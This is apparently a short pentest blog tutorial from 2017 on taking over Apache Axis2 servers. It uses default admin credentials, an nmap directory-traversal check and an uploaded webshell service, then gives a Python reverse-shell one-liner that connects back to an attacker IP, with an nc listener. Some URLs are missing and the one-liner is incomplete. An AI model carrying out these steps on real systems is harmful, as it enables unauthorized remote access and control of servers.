Thursday, March 9, 2017

Manually Exploiting Apache Axis2


I do not condone or take responsibility for any illegal use of this tutorial. Please only target hosts you have permission to test.


For this exploit to work you must have:
  1. Valid admin console credentials
    • Default = admin:axis2
  2. Public access to the admin console


There are a couple of ways to potentially find credentials for Axis2 servers. Some of these include: default credentials, weak credentials that can be brute forced, or outdated Axis2 servers. We will use a vulnerability in Apache Axis2 <= v1.4.1 to discover the necessary credentials. This vulnerability is a directory traversal that gives read access to the configuration file. This can be discovered using modules in Nmap and OpenVAS.


$ nmap -p<port> --script http-axis2-dir-traversal <ip>
|_http-axis2-dir-traversal.nse: Admin credentials found -> admin:axis2



  • There is a Metasploit module at "exploit/multi/http/axis2_deployer" that will attempt to "Autopwn" the server.
  • The code can be found at Github.
  • I have tried this exploit multiple times with no success.

Manual Validation

  1.  Navigating to will allow us to get the credentials. They should look like this:
  2. <parameter name="userName">admin</parameter> 
    <parameter name="password">axis2</parameter>
  3. When you navigate to it should give you the login portal.

Create the Payload

A simple Axis2 webshell can be found at
  1. Download the file
  2. Compile the file
    • Modify $JAVA_HOME if necessary
    • "ant -v" to build


  1. Upload the AxisInvoker.aar service.
  2. Verify the deployment by checking the Deactivate or Activate service tab.
  3. Verify the shell works by running
  4. Since stable shells are superior to web shells, we will improve to a stable shell. You will need to find what languages are on the system or use a system native option (like nc).
    • Get a shell and modify it to your host machine.
      • I usually get most of my shells from PentestMonkey
      • import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("<AttackerIP>",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);["/bin/sh","-i"]);
    • Download your reverse shell from your webserver to the victim machine.
    • Listen for the reverse shell by running "nc -nlvp 443".
    • Execute your shell on the victim machine.
    • After a few seconds, you should have a shell on your listener!

Hope that helps in your future pentests!